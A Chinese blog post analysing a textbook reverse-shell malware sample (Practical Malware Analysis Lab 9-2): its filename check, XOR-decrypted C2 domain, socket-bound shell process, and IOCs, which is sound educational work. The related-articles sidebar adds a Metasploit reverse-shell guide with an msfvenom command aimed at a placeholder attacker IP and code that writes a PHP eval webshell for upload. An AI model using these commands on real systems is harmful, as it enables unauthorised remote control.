一款简单的反向shell恶意样本分析

最新推荐文章于 2024-03-05 08:18:23 发布
最新推荐文章于 2024-03-05 08:18:23 发布
阅读量385 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 病毒分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/LoopherBear/article/details/106125778
本文分析了一款简单的反向shell恶意样本,涉及静态和动态分析。样本在满足特定条件时启动一个shell,通过解密获取通信URL,利用gethostbyname获取主机信息,创建进程进行远程交互。该样本要求文件名特定,主要用于实现远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一款简单的反向shell恶意样本分析

样本来自《恶意软件分析实战》第九章的的实验二。

静态分析

基本信息

查看样本信息,发现程序没有加壳,使用VC++基编写

在这里插入图片描述
编译时间2011/041/30

在这里插入图片描述

接着查看字符串,没有发现有用的信息,如下

在这里插入图片描述

静态分析

使用ida分析来到入口函数,发现初始化了一堆参数

在这里插入图片描述

接着调用GetModuleFileNameA函数获取样本执行的路径,并判断当前样本的名称是否为ocl.exe,如果不是则退出

在这里插入图片描述

如果相同则创建socket链接,否则退出。这里进入创建socket链接

在这里插入图片描述

在调用gethostbyname函数前,会调用sub_401089函数解密出要获取的name。其中ebp=var_1B0的参数是在初始化的时候就给定了一个字符串,如下

在这里插入图片描述

整理后得到1qaz2wsx3edc,参数ebp+var_1F0的值是一个经过加密的数组

在这里插入图片描述

这里将数组导出备用,导出方式为

在这里插入图片描述

这里导出为C数组即可,如下

在这里插入图片描述
经过分析函数sub_401089可知

  • 获取key=1qaz2wsx3edc的长度 slen,
  • 循环32次,每次获取一个key[index%slen]^(index+data[i])

如下

在这里插入图片描述

解密后的字符串为

www.practicalmalwareanalysis.com

接着调用gethostbyname获取主机信息并调用函数sub_401000创建一个进程,其中进程的输入输入控制是连接的socket对象,创建的进程就相当于一个shell,负责和远程进行交互,如下

在这里插入图片描述

创建进程完成后,开始循环等待,每隔0x7530运行一次。

在这里插入图片描述

动态分析

程序运行后,首先判断运行的程序名称是否为ocl.exe如下

在这里插入图片描述

这里需要过掉这个判断,运行到je

00401240 | 74 0A              | je lab09-02.40124C

ZF=0 -->ZF=1之后来到调用解密函数位置对应的参数分别是

在这里插入图片描述
需要解密的数组如下

在这里插入图片描述

解密后的数据

在这里插入图片描述

之后程序会创建一个进程,这个进程负责和远程进行通信。

程序首先初始化了key,判断程序是否为ocl.exe如果是则运行,如果不是则退出。这里选择path掉这个校验,创建一个socket,之后解密出gethostbyname的参数name获取对应的name的host信息,之后创建一个进程,这个进程的输入和输入都是通过创建的socket来通信,这个程序运行之后每隔0x7530运行一次。

总结

这个样本运行要求修改样本名称为ocl.exe才能运行,并且程序是一个反向shell控制程序,通过运行时解密出url并通过gethostbyname获取通信信息。通过设置CreateProcess函数的StartupInfo中的input output error为sockcet对象来实现接收远程的输入。

IOCs

URL

www[.]practicalmalwareanalysis.com

sha256

F153DFACEC09DD69809C3BBF68270A38EE3701F44220C7BF181C14A68C138133
恶意软件分析大合集
Sumarua的博客
05-09 827
这个列表记录着那些令人称赞的恶意软件分析工具和资源。受到 awesome-python 和 awesome-php 的启迪。
利用AI+大数据的方式分析恶意样本(四)
至臻求学,胸怀云月
03-23 3111
文章目录系列文章目录本文主旨分析windows程序的必备知识恶意代码功能下载器和启动器后门登陆凭证窃取存活机制提权隐藏踪迹——用户态的Rootkit环境配置预备知识节点和边二分网络网络可视化使用NetworkX构建网络使用GraphViz可视化进阶操作添加属性GraphViz使用参数调整网络构建恶意软件回连服务器网络编码如下效果图构建恶意软件共享图像关系网络编码如下效果图小结 系列文章目录 《基...
恶意代码--windows脚本wscript恶意样本逆向分析
关注互联网安全的小虾米一枚
08-17 2949
0x01 基本分析 File: C:\Users\luke\Desktop\finance\inv_36f5e7.js Size: 5942 bytes Modified: 2016年8月17日, 18:54:00 MD5: C533B463D5598971BB32C1F743DDCC00 SHA1: C428931655EDE93A162B347525F5095FA78A454C C
恶意代码--微软jscript程序样本逆向分析
关注互联网安全的小虾米一枚
02-13 2499
信息安全,恶意代码分析,钓鱼邮箱附件。
HRAT:反向Shell和Keylogger恶意软件
04-22
赫拉特 反向Shell和Keylogger恶意软件。 我做了这个简单的项目,作为研究恶意软件分析时所学知识的实际应用。 对于任何开始研究恶意软件分析的人来说,看到一个真正的简单恶意软件都是很有用的,这样他就可以想象自己正在研究什么。
Shell反向Shell
corinne0623的博客
09-03 459
Shell 是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言。 Shell 是指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。 Shell 编程跟 JavaScript、php 编程一样,只要有一个能编写代码的文本编辑器和一个能解释执行的脚本解释器就可以了。 Linux 的 Shell 种类众多,常见的有: Bourne Shell(/usr/bin/sh或/bin/sh) Bourne Again She
第一个shell脚本-监测恶意登录远程服务器
weixin_34162629的博客
04-22 273
最近学习到linux系统日志和计划任务,下班回家的地铁上有了灵感,尝试编写了自己的第一个脚本,监测如果有恶意登录服务器的话,发邮件通知管理员。暂时还没学习到如何发邮件给管理员,目前只是命令行的提醒和日志记录;脚本的内容也比较简单,都是学习过的基本知识,活学活用。1、首先编写一个脚本:定义一个变量LT,变量的值为lastb命令列出的行数(即无效登录的次数,如有恶意登录的话行数会变多);执行一个if判...
恶意代码分析实战 Lab19
baidu_41108490的博客
06-10 860
lab19-011IDApro打开看到解码代码如下od调试的时候显示说无法作为及时调试器调试,所以只能用windbg,虽然麻烦了点解码后程序先跳到003a0464接着在464处,马上调用003a03bf函数步入查看程序又调用003a039e函数步入查看函数,这段函数很短,可以很容易看出来是在得到kernel32的base地址,看30h是的搭配peb结构地址,1ch是得到InInitializati...
恶意软件分析资料大合集
我在全球村
05-31 2892
在研究malware移除的过程中,发现了下面的一些病毒软件分析资料,整理收藏过来,分享给需要的人。 这个列表记录了非常多的恶意软件分析工具和资源。可以根据需要点击链接进入了解详情。 恶意软件集合 匿名代理 蜜罐 恶意软件样本库 开源威胁情报 工具 其他资源 检测与分类 在线扫描与沙盒 域名分析 浏览器恶意软件 文档和 Shellcode 文件提取 去混...
恶意样本分析手册——API函数篇
zzkk_的博客
09-04 1486
文件类、网络类、注册表与服务类、进程线程类、注入类、驱动类、加密与解密、消息传递等各种类别恶意样本分析。 文件类 kernel32!CreateFile 功能:这是一个多功能的函数,可打开或创建以下对象,并返回可访问的句柄:控制台,通信资源,目录(只读打开),磁盘驱动器,文件,邮槽,管道 函数原型: HANDLE WINAPI CreateFile( _In_ LP
逐行分析PowerShell 恶意代码
weixin_33982670的博客
09-19 941
本文讲的是逐行分析PowerShell 恶意代码,PowerShell恶意软件作者用于在受害者计算机上获得立足点的首选程序。PowerShell被经常使用的一个原因是因为它能够更改操作系统和系统资源。它根据具体的功能将本机的Windows命令行提升到了另一个级别。一旦恶意进程能够以提升的权限执行PowerShell命令行,那么该恶意软件的能力将变得“无...
一个简单反向shell
weixin_33941350的博客
03-18 379
这个是在《Python***学习笔记:从HelloWorld到编写PoC(上)》 中看到的一个反向shell代码,因为本身我是学python3的,所以我把代码改成的python3。同时也做了编码方面一些小改动,使这个代码在linux和windows下都可以运行。udp_server.py#!/usr/bin/python3 __author__='Administrato...
操作系统之文件管理:1、初识文件管理
千寻瀑
10-11 766
1、初识文件管理思维导图文件的定义关于文件系统我们要讨论的几个问题?1、文件属性2、文件内部的数据组织形式(存储结构)3、文件之间的组织形式4、操作系统向上层提供的接口(功能)5、文件如何存放在外存?(物理结构)6、其他文件管理功能 PS:本篇仅是概述,对文件系统的初步介绍,有需要请看链接博客 思维导图 文件的定义 文件:一组有意义的信息/数据的集合 关于文件系统我们要讨论的几个问题? 1、文件属性 2、文件内部的数据组织形式(存储结构) 本质上来看:文件内部数据的组织形式其实就是文件的逻
恶意样本分析手册——理论篇
iopoint的专栏
07-27 829
0x00写在最前面 开场白:快报快报!今天是2017 Pwn2Own黑客大赛的第一天,长亭安全研究实验室在比赛中攻破Linux操作系统和Safari浏览器(突破沙箱且拿到系统最高权限),积分14分,在11支队伍中暂居 Master of Pwn 第一名。作为热爱技术乐于分享的技术团队,我们开办了这个专栏,传播普及计算机安全的“黑魔法”,也会不时披露长亭安全实验室的最新研究成果。 安全领域博大精深,很多童鞋都感兴趣却苦于难以入门,不要紧,我们会从最基础的内容开始,循序渐进地讲给大家。技术长路漫漫,我们携.
漫谈shell脚本
weixin_34054866的博客
06-14 103
一. 关于shell shell,英文是壳,外壳的意思,至于在计算机中,同样有这样的一层意思,也就是可以将shell看做是计算机系统封装的一层外壳,来供用户使用,因此,用户可以通过操纵shell也就是输入一系列命令来达到各种需要的目的,那么shell也可以被称为命令解释器。 在shell下,用户可以键入一行命令而shell解释一行来使其依次执行不同的任务,这种方式...
恶意样本分析流程记录
weixin_42877778的博客
01-15 3324
拿到一个恶意样本,要先对其进行静态分析了解其基本函数,推测它的功能,然后再进行动态分析测试样本执行,学习《恶意样本分析实战》并在此记录对于一个恶意样本应该进行的流程分析。 反病毒引擎扫描 在拿到一个恶意样本时可以先使用多个反病毒软件扫描这个文件, ...
恶意样本分析入门与实战
pandazhengzheng的博客
03-05 1943
恶意软件分析入门与实战资源
shell脚本自动拉黑恶意试图攻击IP
qq_20763435的博客
06-14 1372
(本文章只是用于个人用时查看,有问题请勿喷!觉得行可供参考。)     首先我来说下配置这个shell脚本的原理,为什么要配置这个脚本.   在Linux中,虽然系统自带有iptables防火墙,但是这只能说服务器相对安全,但不能说服务器非常安全。当服务器配置了防火墙,但是还是有人恶意对我们的端口进行扫描,进行攻击。 如果我们允许22端口对外网所有人访问,如果我们没有做VPN,比如我...
CreateProcess 重定向CMD实现反弹shell
hambaga的博客
03-01 496
这段代码比我还老了,哈哈~ 功能很简单,就是一直尝试向某个ip:port反弹shell,C2用nc就能接收这个反弹shell。 // RedirectCmd.cpp : Defines the entry point for the console application. // 还原《恶意代码分析实战》第九章练习样本2 #include "stdafx.h" #include <WinSock2.h> #include <Windows.h> #pragma comment(l
用metasploit生产反弹shell
最新发布
03-15
### 使用 Metasploit 框架生成反弹 Shell 的配置说明 #### 配置目标 为了实现从目标主机到攻击者机器的反弹 Shell 连接,可以使用 Metasploit 提供的强大功能。以下是基于 Metasploit 框架生成反弹 Shell 的具体操作流程。 --- #### 准备工作 1. **启动 Docker 容器** 如果尚未运行 `remnux/metasploit` 容器,则可以通过以下命令启动容器并进入其交互模式[^1]: ```bash docker run -it --rm remnux/metasploit /bin/bash ``` 2. **加载 Metasploit 控制台** 在容器内部执行以下命令以启动 Metasploit Framework 控制台: ```bash msfconsole ``` --- #### 创建反弹 Shell 的步骤 ##### 1. 设置监听模块 在 Metasploit 中,选择适合的监听模块用于接收来自目标系统的连接请求。通常使用的模块为 `multi/handler`。 ```plaintext use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp ``` 上述命令选择了适用于 Windows 系统的目标负载(payload),支持 TCP 协议的反向 Meterpreter Shell[^3]。 ##### 2. 配置参数 设置必要的选项以便成功建立通信链路: - LHOST (本地 IP 地址): 攻击者的公网或局域网地址; - LPORT (端口号): 自定义开放端口,默认可设为 4444; 示例代码如下所示: ```plaintext set LHOST <your_local_ip> set LPORT 4444 exploit -j -z ``` 此处 `-j` 参数表示后台运行作业,而 `-z` 则让程序不阻塞当前会话继续其他任务处理[^2]。 ##### 3. 构建有效载荷 利用 Msfpayload 工具生成可用于部署于受害设备上的恶意软件样本文件。这里我们采用 Ruby 脚本来演示如何创建自定义 PHP Webshell 实现远程访问目的: ```ruby file = File.open("/tmp/shell.php", "w") file.puts("<?php @eval($_POST['cmd']);?>") file.close() print_good("PHP webshell has been created at /tmp/shell.php.") ``` 或者直接调用内置命令快速完成相同效果的操作过程: ```plaintext msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f raw > shell.php ``` 最后一步就是把生成好的脚本上传至服务器相应位置等待触发条件满足即可获得完全控制权。 --- ### 注意事项 - 确保防火墙规则允许指定端口的数据流入流出。 - 测试环境应严格隔离真实网络以防意外扩散风险。 - 所有活动均需得到合法授权方可实施。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值